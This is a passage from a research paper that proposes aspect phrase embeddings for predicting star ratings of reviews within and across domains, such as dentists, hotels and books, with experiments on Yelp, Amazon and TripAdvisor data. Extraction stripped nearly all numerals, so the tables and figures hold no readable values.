performed experiments predicting the ratings of hotel reviews, using a regression model that looked at different aspects discussed in a review, with the intuition that different aspects would have different levels of importance towards determining the rating. recent years have seen an active interest in researching approaches to review rating prediction but are still limited to popular domains and do not consider the case of domains lacking training data. in a number of cases, features extracted from products and users are being used (jin et al., ; lei, qian & zhao, ; seo et al., b; wang et al., ), which limits the ability to apply a prediction system to new domains and to unseen products and users. tang et al. ( ) studied different ways of combining features extracted from the review text and the user posting the review. they introduced the user-word composition vector model (uwcvm), which considers the user posting a review to determine the specific use that a user makes of each word. while this is a clever approach to consider differences across users, it also requires observing reviews posted by each user beforehand, and cannot easily generalise to new, unseen users, as well as to new review domains where we lack any information about those users. an approach that predicts review ratings from the review text alone is that by fan & khademi ( ). they performed a study of two kinds of features: bag-of-words representations of reviews, as well as part-of-speech tags of the words in the review. 
they studied how the top k keywords in a dataset contributed to the performance of the rating prediction system, finding that a multinomial logistic regression classifier using the top keywords performed best. others have used topic modelling techniques like lda or plsa to identify the aspects that users discuss in restaurant reviews; however, they did not study their effectiveness for review rating prediction (titov & mcdonald, ; huang, rogers & joo, ; zhou, wan & xiao, ; vargas & pardo, ). one of the most recent methods by cheng et al. ( ) combines topic modelling with a neural network classifier. the approach, called a ncf, extracts users’ preferences and jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. items’ characteristics on different aspects from reviews. an lda topic modelling layer is used to then generate topic-specific representations of users and items. subsequently, the method uses an attention network which combines these user and item features extracted from reviews. this method is shown to outperform an earlier method by catherine & cohen ( ), called transnet, which uses two convolutional neural networks to learn latent representations of users and items. we will use the approach by cheng et al. ( ), namely a ncf, as a state-of-the-art baseline classifier. in this paper, we propose to perform a textual analysis of reviews that goes beyond the sole exploration of the whole text as a unit. our method also looks at the aspect phrases mentioned in the text, which contain the core opinionated comments. this is the case of good food for a restaurant or comfortable bed for a hotel. while these differ substantially across review domains, we propose to leverage aspect phrase embeddings to achieve representations of aspect phrases to enable generalisation. this allows us to perform cross-domain review rating experiments, where one can build a rating prediction model out of larger training data thanks to leveraging labelled data from other domains. to the best of our knowledge, ours is the first work to perform rating predictions for review domains with scarce training data, such as dentists, as well as the first to propose and test a cross-domain review rating prediction system. datasets to enable our analysis of review rating prediction over different domains, we make use of different datasets, each associated with a different domain. we use three different data sources to generate our datasets: ( ) a publicly available collection of million reviews from yelp (https://www.yelp.com/dataset), ( ) a collection of more than million reviews from amazon provided by mcauley et al. ( ); he & mcauley ( ), and ( ) a collection of more than million reviews retrieved from businesses listed in tripadvisor’s top cities. we filter categories of reviews from these datasets, which gives us different datasets that enable us to experiment with review rating prediction over different types of businesses and products. all of the datasets include both the review text and the review rating in a scale from to . the use of a standardised – rating scale facilitates experimentation of rating prediction systems across domains. table shows the list of datasets we use for our experimentation. our datasets comprise more than million reviews overall, distributed across different types of businesses, where some businesses are far more popular than others. 
the number of reviews per type of business ranges from million reviews for books to , reviews for dentists, showing a significant imbalance in the size and popularity of different domains. the variability of dataset sizes and popularity of review domains enables our analysis looking at the effect of the availability of large amounts of in-domain data for training. in fig. we show a breakdown of the – star ratings for each dataset. we observe an overall tendency of assigning high ratings across most categories, except in the cases of casinos and resorts, where the ratings are more evenly distributed. most categories show an upwards tendency with higher number of reviews for higher ratings, as is the case with jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.yelp.com/dataset http://dx.doi.org/ . /peerj-cs. table details of the datasets, sorted by number of reviews. the number of reviews that each type of business/product receives varies drastically. business/product source # reviews books amazon , , restaurants tripadvisor , , attractions tripadvisor , , clothing amazon , , homeware amazon , , hotels tripadvisor , , nightlife yelp , events yelp , casinos yelp , hair salons yelp , resorts yelp , dentists yelp , total – , , a ttr ac tio ns b oo ks c as in os c lo th in g d en tis ts e ve nt s h ai r s al on s h om ew ar e h ot el s n ig ht lif e r es or ts r es ta ur an ts stars stars stars stars star figure distributions of star ratings in the datasets. . full-size doi: . /peerjcs. /fig- attractions, books or restaurants. interestingly, in the case of dentists and hair salons, the ratings that prevail are ′s and ′s, showing that users tend to either love or hate these services. methodology one of the key challenges of dealing with reviews pertaining to different domains is that the vocabulary can vary significantly. we can expect that people will express that they like or dislike a product in different ways for different domains. for example, one may make a reference to good food when reviewing a restaurant, a comfortable bed for a hotel, an inspiring novel for a book and a fun party for an event. all of these could be deemed jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. similarly positive for each domain, however without a proper method to capture these semantics, predictions made across domains may not be accurate enough. to tackle this problem, we propose to use aspect phrase embeddings. aspect phrase extraction and representation different review domains tend to have different aspect categories associated with them. while one may care about food quality in restaurants, the focus is instead on the engagement when reviewing a book. even if other aspect categories such as price are more widely generalisable across domains, most aspect categories and associated vocabulary vary across domains. in the first instance, we are interested in capturing those phrases associated with aspect categories, which we refer to aspect phrases. we define aspect phrases as tuples providing opinionated judgement of a particular aspect of a product, e.g., excellent food for restaurants or interesting reading for books. once we have these tuples, in a second step we use word embeddings to achieve a generalisable semantic representation of the aspect phrases. 
aspect phrase extraction to extract the tuples corresponding to aspect phrases from the reviews, we rely on the assumption that these opinionated tuples will be made of ( ) a sentiment word that judges the object or action concerned and ( ) a non-sentiment word that refers to the object or action being judged. to restrict the context in which a tuple can be observed, we consider segments of the reviews, i.e., sentences or parts of sentences that are independent from each other. we perform the extraction of aspect phrases by following the next steps: . pos tagging: we extract the part-of-speech (pos) tags of all words in the reviews by using nltk’s pos tagger (bird & loper, ), hence labelling each word as a noun, verb, adjective, adverb, etc. . identification of sentiment words: we use the sentiment lexicon generated by hu & liu ( ), which provides a list of over , words associated with positive or negative sentiment. with this list, we tag matching keywords from reviews as being positive or negative. . segmentation of reviews: we break down the reviews into segments. to identify the boundaries of segments, we rely on punctuation signs (, . ; :) and coordinating conjunctions (for, and, nor, but, or, yet, so) as tokens indicating the end of a segment. text at either side of these tokens are separated into different segments. . extraction of aspect phrases: at this stage, we only act within the boundaries of each segment. within each segment, we identify pairs of words made of ( ) a sentiment word labelled as positive or negative and ( ) a word labelled as noun or verb by the pos tagger and identified as a non-sentiment word, i.e., not matching any of the keywords in the sentiment lexicon. each pair of words matching these criteria within a segment is extracted as a tuple pertaining to an aspect phrase. through the process above, we extract aspect phrases for all review domains. table shows the most salient aspect phrases for each of the review domains. we observe that aspect phrases vary substantially across domains, with phrases referring to the ease of use jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table list of most salient aspect phrases for the review categories. category top aspect phrases books (great, book) (good, book) (like, book) (recommend, book) (well, written) restaurants (good, food) (good, was) (delicious, was) (great, food) (good, service) attractions (worth, visit) (beautiful, is) (worth, is) (free, is) (attraction, is) clothing (comfortable, are) (well, made) (worn, have) (perfectly, fit) (love, shoes) homeware (easy, clean) (easy, use) (great, works) (well, works) (stainless, steel) hotels (nice, hotel) (good, hotel) (great, hotel) (recommend, hotel) (clean, was) nightlife (happy, hour) (good, was) (pretty, was) (good, were) (good, food) events (nice, was) (clean, was) (pretty, was) (clean, room) (nice, room) casinos (nice, was) (nice, room) (like, casino) (like, room) (clean, room) hair salons (great, hair) (like, hair) (amazing, hair) (best, hair) (recommend, salon) resorts (grand, mgm) (lazy, river) (nice, was) (nice, room) (like, room) dentists (best, dentist) (wisdom, teeth) (work, done) (clean, office) (recommend, office) for homeware, comfort for clothing, food quality for restaurants or happy hour for nightlife, among others. aspect phrase representation despite the ability of our method above to capture aspect phrases independent of the domain, these still vary in terms of vocabulary. 
to achieve semantic representations of aspect phrases extracted for different domains, we make use of word vec word embeddings (mikolov et al., ). we train a word embedding model using the million reviews in our datasets. this model is then used to achieve semantic representations of the aspect phrases with the following two variants:
• aspect phrase embeddings (ape): we aggregate all the aspect phrases extracted for a review. we generate the embedding vector for each review by adding up the word embeddings for all words included in those phrases.
• polarised aspect phrase embeddings (pape): we aggregate the aspect phrases for a review in two separate groups, one containing positive phrases and the other containing negative phrases. following the same method as for aspect phrase embeddings, here we generate a separate embedding representation for each group, which leads to an embedding representation for positive aspect phrases and another embedding representation for negative aspect phrases. we then concatenate both embeddings to get the combined vector.

experiment settings
cross-validation
we perform different sets of experiments for comparing the performance of our rating prediction systems in in-domain and cross-domain settings for different domains. as we are interested in performing -fold cross-validation experiments for both settings, we randomly split the data available for each domain $d \in \{ .. \}$ into equally sized folds, $f \in \{ .. \}$. each time, one of these folds is considered as the test data, $\mathrm{test}_{ij}$, while the training data depends on the setting, i.e., ( ) $\sum_{f \in \{ .. \},\, f \neq j,\, d = i} \mathrm{train}_{df}$ for in-domain experiments, and ( ) $\sum_{d \in \{ .. \},\, d \neq i,\, f = j} \mathrm{train}_{df}$ for cross-domain experiments. we ultimately average the performance scores across all folds in each setting.

classifiers
in setting up the experiments for our analysis, we tested all the classifiers proposed by fan & khademi ( ) and some more, including a multinomial logistic regression, a gaussian naive bayes classifier, support vector machines and random forests. our experiments showed that the multinomial logistic regression was clearly and consistently the best classifier, and hence for the sake of clarity and brevity we report results using this classifier in the paper.

features and baselines
we implement four different sets of features, which include two baselines and two methods that we propose:
• baseline (a ncf): introduced by cheng et al. ( ), a ncf is a model that extracts users' preferences and items' characteristics on different aspects from reviews. they introduce an attention network which utilises these user and item features extracted from reviews, and which aims to capture the attention that a user pays to each aspect of an item in a review. in the absence of cross-domain rating prediction systems in previous work, we use a ncf as the state-of-the-art rating prediction system to beat.
• baseline using word embeddings (w v): we implement a second baseline consisting of a word embedding representation of the entire text of a review, obtained by averaging all the embeddings. we use the word embedding model we trained from our review datasets, which serves as a comparable baseline to measure the impact of aspect phrase embeddings on the performance of the rating prediction system.
• aspect phrase embeddings (ape): we concatenate the word embedding vectors obtained for the entire texts of reviews with the aspect phrase embeddings, i.e., word embedding representations of the aspect phrases extracted from a review.
• polarised aspect phrase embeddings (pape): we concatenate the word embedding vectors obtained for the entire texts of reviews with the polarised aspect phrase embeddings, i.e., a concatenation of the word embedding representations of positive aspect phrases and the word embedding representation of negative aspect phrases.

note that baseline methods from more recent works are not directly applicable to our task as they make use of user data, which is not applicable in cross-domain scenarios where users are different across domains and platforms. because our objective is to build a review rating prediction system that would then be applicable to other sources on the web, relying on user metadata is not realistic, given that we often do not know the author of a text on the web or the authors are different from those in the training data. hence, we use the state-of-the-art text-only review rating prediction system by fan & khademi ( ), as well as a baseline using word embeddings, which enables direct comparison with the use of aspect phrase embeddings as additional features.

evaluation
the review rating prediction task can be considered as a rating task with five different stars from to . as a rating task, we need to consider the proximity between the predicted and reference ratings. for instance, if the true star rating of a review is stars, then the predicted rating of stars will be better than a predicted rating of stars. to account for the difference or error rate between the predicted and reference ratings, we rely on the two metrics widely used in previous rating prediction work (li et al., ): the root mean square error (rmse) (see eq. ( )) and the mean absolute error (mae) (see eq. ( )).

$\mathrm{rmse} = \sqrt{\dfrac{\sum_{i=1}^{n} (y_i - r_i)^2}{n}}$ ( )

$\mathrm{mae} = \dfrac{\sum_{i=1}^{n} |y_i - r_i|}{n}$ ( )

where n denotes the total number of reviews in the test set, yi is the predicted star rating for the ith review, and ri is the real star rating given to the ith review by the user. we report both metrics for all our experiments, to facilitate the comparison for future work.

results
the results are organised in two parts. first, we present and analyse results for in-domain review rating prediction, where the training and test data belong to the same domain. then, we show and analyse the results for cross-domain review rating prediction, where data from domains that differ from the test set is used for training. a comparison of the performance on both settings enables us to assess the suitability of leveraging a cross-domain classifier as well as the use of aspect phrase embeddings.

in-domain review rating prediction
tables and show results for in-domain review rating prediction, where the training and test data belong to the same domain. experiments are performed using -fold cross validation within each of the datasets. note that lower scores indicate a smaller amount
table mae results for in-domain review rating prediction. categories are sorted in descending order by number of reviews, with the most popular review categories at the top of the list.
mae a ncf w v ape pape w v + ape w v + pape books . . .
. . . restaurants . . . . . . attractions . . . . . . clothing . . . . . . homeware . . . . . . hotels . . . . . . nightlife . . . . . . events . . . . . . casinos . . . . . . hair salons . . . . . . resorts . . . . . . dentists . . . . . . of error and hence better performance. these results show that both ape and pape combined with word embeddings (w v+ape and w v+pape) consistently outperform the sole use of word embeddings (w v). we also observe that the sole use of phrase embeddings (ape and pape) does not suffice to outperform word embeddings, whereas their combination with w v leads to clear improvements in all cases. this proves the importance of phrases, however we also see that using the rest of the text in the review is useful to boost performance. likewise, both of our combining methods clearly outperform the baseline method (a ncf) by cheng et al. ( ), with the exception of attractions when the performance is measured using rmse, which is the only case where the baseline performs better; the combining methods leveraging phrase embeddings are clearly better for the rest of the domains. this emphasises the importance of using word embeddings for capturing semantics of aspect phrases, even when the experiments are within the same domain. a comparison between our two proposed methods using phrase embeddings shows that polarised phrase embeddings outperform phrase embeddings for the most popular review categories, whereas the difference is not so clear for less popular categories. all in all, these results show that the use of either form of phrase embeddings combined with word embeddings leads to improvements in the review rating prediction when the training and test data belong to the same domain. the main goal of our work is however to show their effectiveness on cross-domain review rating prediction, which we discuss in the next section. the in-domain results presented in this section enable us to perform a comparison with the cross-domain results presented next. cross-domain review rating prediction tables and show results for cross-domain review rating prediction. while experiments are also performed using -fold cross-validation, we train the classifier for a particular domain using data from the other datasets, i.e., simulating the scenario where we do not have any labelled data for the target domain. we also include results for the best jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table rmse results for in-domain review rating prediction. categories are sorted in descending or- der by number of reviews, with the most popular review categories at the top of the list. rmse a ncf w v ape pape w v + ape w v + pape books . . . . . . restaurants . . . . . . attractions . . . . . . clothing . . . . . . homeware . . . . . . hotels . . . . . . nightlife . . . . . . events . . . . . . casinos . . . . . . hair salons . . . . . . resorts . . . . . . dentists . . . . . . table mae results for cross-domain review rating prediction. bid, best in-domain. categories are sorted in descending order by number of reviews, with the most popular review categories on top of the list. mae a ncf bid w v ape pape w v + ape w v + pape books . . . . . . . restaurants . . . . . . . attractions . . . . . . . clothing . . . . . . . homeware . . . . . . . hotels . . . . . . . nightlife . . . . . . . events . . . . . . . casinos . . . . . . . hair salons . . . . . . . resorts . . . . . . . dentists . . . . . . . 
performance for each review category when we train with data from the same domain, which is represented as bid (best in-domain). this enables us to compare whether and the extent to which the use of out-of-domain data for training can help to improve the performance for each review category. results show a remarkable difference between popular and non-popular review categories. for the most popular review categories (books, restaurants, attractions, clothing, homeware, hotels), the best performance is obtained by the best in-domain (bid) classifier, which indicates that for review categories with large amounts of training data, it is better to use in-domain data. however, when we look at the bottom review categories (nightlife, events, casinos, hair salons, resorts, dentists), we observe that the cross-domain jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table rmse results for cross-domain review rating prediction. bid, best in-domain. categories are sorted in descending order by number of reviews, with the most popular review categories on top of the list. rmse a ncf bid w v ape pape w v + ape w v + pape books . . . . . . . restaurants . . . . . . . attractions . . . . . . . clothing . . . . . . . homeware . . . . . . . hotels . . . . . . . nightlife . . . . . . . events . . . . . . . casinos . . . . . . . hair salons . . . . . . . resorts . . . . . . . dentists . . . . . . . classifier leveraging out-of-domain data for training achieves higher performance. while the sole use of word embeddings (w v) leads to improved performance for the least popular categories, the improvement is even better when we incorporate either phrase embeddings or polarised phrase embeddings. the results are also positive for the w v+pape over the w v+ape; even if the results are not better in % of the cases, w v+pape tends to outperform w v+ape in most cases, with just a small difference when ape is better, showing that one can rely on pape for all cases dealing with non-popular domains. our combining methods (w v+ape and w v+pape) also outperform the state-of-the-art baseline a ncf for all of the non-popular review domains, with some variation for the popular review domains. this again reinforces the potential of our methods combining phrase embeddings for cross-domain review rating prediction applied to review domains with little training data available. these experiments show a clear shift in the performance of in-domain classifiers when the amount of training data decreases, encouraging the use of out-of-domain data for training in those cases. likewise, this motivates the use of the cross-domain classifier for new domains where no labelled data is available for training, for instance because reviews are collected from a website where no ratings are given by the user, such as facebook, twitter or comments on blogs. further to this, fig. shows the relative improvements of our w v+pape cross-domain classifier over the a ncf and the bid classifiers, both for the mae and rmse metrics. review domains are sorted by popularity on the x axis, with the least popular domains on the right. the relative improvement on each review domain is represented by the blue line. the line of best fit (in black) shows the overall tendency of our cross-domain classifier to achieve an increasing relative improvement over other methods as the popularity of the review domain and subsequently the amount of in-domain training data increases. 
this jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . . . . . a) mae improvement over a ncf − . − . . . b) mae improvement over best in−domain − . . . . . . c) rmse improvement over a ncf − . − . . . d) rmse improvement over best in−domain figure relative improvement of the w v+pape cross-domain classifier over the a ncf and best in-domain (bid) classifiers. review domains are sorted by popularity on the x axis, with the least pop- ular domains on the right. the relative improvement on each review domain is represented by the blue line. the line of best fit (in black) shows the overall tendency of our cross-domain classifier to achieve an increasing relative improvement over other methods as the popularity of the review domain and subse- quently the amount of in-domain training data increases. full-size doi: . /peerjcs. /fig- reinforces our cross-domain classifier as a suitable alternative to achieve the best results on the least popular domains, outperforming any other in-domain alternative. effect of the size of the training data since cross-domain experiments benefit from larger training sets, we assess the effect of the size of the training data on the performance of the rating prediction system. we evaluate the performance of cross-domain rating prediction by using different percentages of the training data available, ranging from % to %, which we then compare with the best jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table mae results for cross-domain review rating prediction with different percentages of the training data. bid, best in-domain. categories are sorted in descending order by number of reviews, with the most popular review categories on top of the list. mae books . . . . . . . . bid= . restaurants . . . . . . . . bid= . attractions . . . . . . . . bid= . clothing . . . . . . . . bid= . homeware . . . . . . . . bid= . hotels . . . . . . . . bid= . nightlife . . . . . . . . bid= . events . . . . . . . . bid= . casinos . . . . . . . . bid= . hair salons . . . . . . . . bid= . resorts . . . . . . . . bid= . dentists . . . . . . . . bid= . in-domain rating prediction system. the subset of the training data is randomly sampled until the percentage is satisfied. tables and show the results of using different percentages of the training data for the rating prediction based on mae and rmse respectively. results for each review category is compared with the best in-domain (bid) result, and the best results are highlighted in bold, i.e., either the best in-domain when this is the best, or the specific percentages when the cross-domain prediction system performs best. as we observed before, the in-domain prediction system performs better for the top review categories based on popularity, thanks to the availability of more training data. we are particularly interested in seeing how much data we need with the less popular categories for the cross-domain rating prediction systems to perform better than their in-domain counterparts. looking at the least popular review categories, we observe that using only % of the training data suffices in all cases to outperform the best in-domain system, with the percentage dropping up to % for casinos and hair salons and up to % for resorts. note that out of the (up to) million reviews available for cross-domain training, a subset jiang and zubiaga ( ), peerj comput. sci., doi . 
/peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table rmse results for cross-domain review rating prediction with different percentages of the training data. bid, best in-domain. categories are sorted in descending order by number of reviews, with the most popular review categories on top of the list. rmse books . . . . . . . . bid= . restaurants . . . . . . . . bid= . attractions . . . . . . . . bid= . clothing . . . . . . . . bid= . homeware . . . . . . . . bid= . hotels . . . . . . . . bid= . nightlife . . . . . . . . bid= . events . . . . . . . . bid= . casinos . . . . . . . . bid= . hair salons . . . . . . . . bid= . resorts . . . . . . . . bid= . dentists . . . . . . . . bid= . of % only represents (up to) . million reviews, which are easy to obtain through online review platforms. we also observe that, while performance keeps improving as we increase the size of the training data, it generally shows a tendency to plateau after % of the reviews are used for training. this reflects that after about . million reviews the system has enough training data and can hardly improve its performance. conclusions in this work we have proposed a novel method that leverages aspect phrase embeddings for predicting the star rating of online reviews, which is applicable in in-domain and cross-domain settings. we have also shown that our cross-domain approach is effective for making predictions in review domains with a paucity of training data, where training data from other domains can be successfully exploited. previous work on review rating prediction had been limited to popular reviews domains, such as restaurants or hotels. our study broadens the findings of previous works by experimenting on different datasets jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. pertaining to different review domains of very different levels of popularity, and collects from different sources including yelp, amazon and tripadvisor. given that some of these review domains have very limited availability of labelled data for training, our aim has been to propose a cross-domain review rating prediction system that would perform well for those non-popular domains. likewise, a cross-domain review rating prediction system can be used to predict ratings of reviews gathered from platforms where users do not assign ratings, such as facebook or twitter. our review rating prediction system leverages both pos taggers and sentiment lexicons to extract aspect phrases from reviews, i.e., phrases referring to different features of a business. to enable generalisation of aspect phrases to different domains, we make use of universal representations using word embeddings; we propose two different models for feature representations, ( ) aspect phrase embeddings (ape), which aggregates all aspect phrases of a review, and ( ) polarised aspect phrase embeddings (pape), which considers positive and negative aspect phrases separately to create an embedding representation for each. we compare our results with those of the best-performing classifier by cheng et al. ( ) and another baseline that uses word embedding representations of the entire review. we developed both in-domain and cross-domain review rating prediction systems following this methodology; this allows us to compare performance on in-domain and cross-domain experiments for different review domains. 
our experiments show that both of our methods leveraging phrase embeddings lead to improvements over the rest of the baseline methods, both in the in-domain and the cross-domain settings. interestingly, a comparison of results for these two experiment settings shows that performance scores are higher for the in-domain classifier when we make predictions on the most popular domains, however the cross-domain classifier leads to substantial improvements for the least popular domains. our results indicate that a classifier trained from in-domain data is more suitable for popular review domains, whereas unpopular review domains can be improved when out-of-domain data is used for training along with our aspect phrase embedding representation. further looking into the amount of data needed for training a cross-domain rating prediction system, we observe that a small sample of about % of the data available (i.e., fewer than million reviews) for the other domains is enough to outperform baseline methods. our work defines the state-of-the-art and the first approach to cross-domain review rating prediction, expanding the hitherto limited research focusing on in-domain settings for popular domains. research in cross-domain review rating prediction is still in its infancy, and we hope that our work will encourage further research in the task. future work on cross-domain review rating prediction could further focus on the detection of implicit aspect phrases for improving performance, as well as in capturing cultural differences in writing reviews, given that users from different countries may express themselves differently when writing positive or negative reviews. to further test additional methods to cross-domain rating prediction, our plans for future work include testing methods for transfer learning and domain adaptation. jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding the authors received no funding for this work. competing interests arkaitz zubiaga is an academic editor for peerj. author contributions • aiqi jiang and arkaitz zubiaga conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: this github repository is related to the code: https://github.com/sleepingaggie/star- rating-prediction. references bird s, loper e. . nltk: the natural language toolkit. in: proceedings of the acl interactive poster and demonstration sessions. stroudsburg: association for computational linguistics, . catherine r, cohen w. . transnets: learning to transform for recommendation. in: proceedings of the eleventh acm conference on recommender systems. new york: acm, – . cheng z, ding y, he x, zhu l, song x, kankanhalli ms. . a ncf: an adaptive aspect attention model for rating prediction. in: international joint conferences on artificial intelligence. stockholm: ijcai, – . fan m, khademi m. . predicting a business star in yelp from its reviews text alone. arxiv preprint. arxiv: . . ganu g, elhadad n, marian a. . beyond the stars: improving rating predictions using review text content. in: th international workshop on the web and databases, vol. . rhode island: webdb, – . 
available at http://people.dbmi.columbia.edu/ noemie/papers/webdb .pdf . goss j. . a melting pot of cuisines: examining the relationship between restaurant ethnicities and food safety inspection scores. phd thesis, georgetown university. he r, mcauley j. . ups and downs: modeling the visual evolution of fashion trends with one-class collaborative filtering. in: proceedings of the international conference on world wide web. geneva: international world wide web conferences steering committee, – . available at https://cseweb.ucsd.edu/~jmcauley/pdfs/www a. pdf . jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/sleepingaggie/star-rating-prediction https://github.com/sleepingaggie/star-rating-prediction http://arxiv.org/abs/ . http://people.dbmi.columbia.edu/noemie/papers/webdb .pdf http://people.dbmi.columbia.edu/noemie/papers/webdb .pdf https://cseweb.ucsd.edu/~jmcauley/pdfs/www a.pdf https://cseweb.ucsd.edu/~jmcauley/pdfs/www a.pdf http://dx.doi.org/ . /peerj-cs. hu m, liu b. . mining and summarizing customer reviews. in: proceedings of the acm sigkdd international conference on knowledge discovery and data mining. acm, – . huang j, rogers s, joo e. . improving restaurants by extracting subtopics from yelp reviews. iconference (social media expo). jin z, li q, zeng dd, zhan y, liu r, wang l, ma h. . jointly modeling review content and aspect ratings for review rating prediction. in: proceedings of the th international acm sigir conference on research and development in information retrieval. new york: acm, – . kaplan am, haenlein m. . users of the world, unite! the challenges and opportuni- ties of social media. business horizons ( ): – doi . /j.bushor. . . . laddha a, mukherjee a. . aspect opinion expression and rating predic- tion via lda—crf hybrid. natural language engineering ( ): – doi . /s x. lei x, qian x, zhao g. . rating prediction based on social sentiment from textual reviews. ieee transactions on multimedia ( ): – doi . /tmm. . . leung cw, chan sc, chung f-l. . integrating collaborative filtering and sentiment analysis: a rating inference approach. in: proceedings of the ecai workshop on recommender systems. – . li f, liu n, jin h, zhao k, yang q, zhu x. . incorporating reviewer and product information for review rating prediction. in: proceedings of the international joint conference on artificial intelligence, vol. . – . liu b, zhang l. . a survey of opinion mining and sentiment analysis. in: mining text data. new york: springer, – . mcauley j, targett c, shi q, van den hengel a. . image-based recommendations on styles and substitutes. in: proceedings of the international acm sigir conference on research and development in information retrieval. new york: acm, – . mikolov t, sutskever i, chen k, corrado gs, dean j. . distributed represen- tations of words and phrases and their compositionality. in: advances in neural information processing systems. nevada: nips, – . available at https://papers. nips.cc/paper/ -distributed-representations-of-words-and-phrases-and-their- compositionality.pdf . mousavizadeh m, koohikamali m, salehan m. . the effect of central and peripheral cues on online review helpfulness: a comparison between functional and expressive products. in: proceedings of the international conference on information systems. ning x, yac l, wang x, benatallah b, dong m, zhang s. . rating prediction via generative convolutional neural networks based regression. pattern recognition letters in press. pang b, lee l. . 
seeing stars: exploiting class relationships for sentiment categoriza- tion with respect to rating scales. in: proceedings of the rd annual meeting of the association for computational linguistics. stroudsburg: association for computational linguistics, – . jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.bushor. . . http://dx.doi.org/ . /s x http://dx.doi.org/ . /tmm. . https://papers.nips.cc/paper/ -distributed-representations-of-words-and-phrases-and-their-compositionality.pdf https://papers.nips.cc/paper/ -distributed-representations-of-words-and-phrases-and-their-compositionality.pdf https://papers.nips.cc/paper/ -distributed-representations-of-words-and-phrases-and-their-compositionality.pdf http://dx.doi.org/ . /peerj-cs. pang b, lee l, vaithyanathan s. . thumbs up?: sentiment classification using machine learning techniques. in: proceedings of the conference on empirical methods in natural language processing. stroudsburg: association for computational linguistics, – . perrin a. . social media usage: – . technical report. pew research center. poria s, cambria e, hazarika d, majumder n, zadeh a, morency l-p. . context- dependent sentiment analysis in user-generated videos. in: proceedings of the th annual meeting of the association for computational linguistics (volume : long papers). – . qu l, ifrim g, weikum g. . the bag-of-opinions method for review rating predic- tion from sparse text patterns. in: proceedings of the rd international conference on computational linguistics. association for computational linguistics, – . quan-haase a, young al. . uses and gratifications of social media: a comparison of facebook and instant messaging. bulletin of science, technology & society ( ): – doi . / . salehan m, kim dj. . predicting the performance of online consumer reviews: a sentiment mining approach to big data analytics. decision support systems : – doi . /j.dss. . . . salehan m, zhang s, aghakhani n. . a recommender system for restaurant reviews based on consumer segment. in: proceedings of the americas conference on information systems. seo s, huang j, yang h, liu y. a. interpretable convolutional neural networks with dual local and global attention for review rating prediction. in: proceedings of the eleventh acm conference on recommender systems. new york: acm, – . seo s, huang j, yang h, liu y. b. representation learning of users and items for review rating prediction using attention-based convolutional neural network. in: rd international workshop on machine learning methods for recommender systems (mlrec)(sdm ). sparks ba, browning v. . the impact of online reviews on hotel booking intentions and perception of trust. tourism management ( ): – doi . /j.tourman. . . . taboada m, brooke j, tofiloski m, voll k, stede m. . lexicon-based methods for sentiment analysis. computational linguistics ( ): – doi . /coli_a_ . tang d, qin b, liu t, yang y. . user modeling with neural network for review rating prediction. in: proceedings of ijcai. – . titov i, mcdonald r. . modeling online reviews with multi-grain topic models. in: proceedings of the th international conference on world wide web. new york: acm, – . tripathy a, agrawal a, rath sk. . classification of sentiment reviews using n- gram machine learning approach. expert systems with applications : – doi . /j.eswa. . . . jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . /j.dss. . . http://dx.doi.org/ . 
/j.tourman. . . http://dx.doi.org/ . /coli_a_ http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /peerj-cs. vargas fa, pardo tas. . aspect clustering methods for sentiment analysis. in: international conference on computational processing of the portuguese language. new york: springer, – . wang b, chen b, ma l, zhou g. . user-personalized review rating prediction method based on review text content and user-item rating matrix. information ( ): . wang y, huang m, zhao l, zhu x. . attention-based lstm for aspect-level sentiment classification. in: proceedings of the conference on empirical methods in natural language processing. – . wang h, lu y, zhai c. . latent aspect rating analysis on review text data: a rating regression approach. in: proceedings of the acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . wang b, xiong s, huang y, li x. . review rating prediction based on user context and product context. applied sciences ( ): doi . /app . xing s, liu f, wang q, zhao x, li t. . a hierarchical attention model for rating prediction by leveraging user and product reviews. neurocomputing : – doi . /j.neucom. . . . ye q, zhang z, law r. . sentiment classification of online reviews to travel destina- tions by supervised machine learning approaches. expert systems with applications ( ): – doi . /j.eswa. . . . zhang q, qu y. . topic-opposite sentiment mining model for online review analysis. journal of frontiers of computer science and technology ( ): – . zhang s, salehan m, leung a, cabral i, aghakhani n. . a recommender system for cultural restaurants based on review factors and review sentiment. in: proceedings of the americas conference on information systems. zhang l, wang s, liu b. . deep learning for sentiment analysis: a survey. wiley interdisciplinary reviews: data mining and knowledge discovery ( ):e . zhao g, qian x, xie x. . user-service rating prediction by exploring social users’ rating behaviors. ieee transactions on multimedia ( ): – doi . /tmm. . . zhou x, wan x, xiao j. . representation learning for aspect category detection in online reviews. in: proceedings of the aaai conference on artificial intelligence. – . jiang and zubiaga ( ), peerj comput. sci., doi . 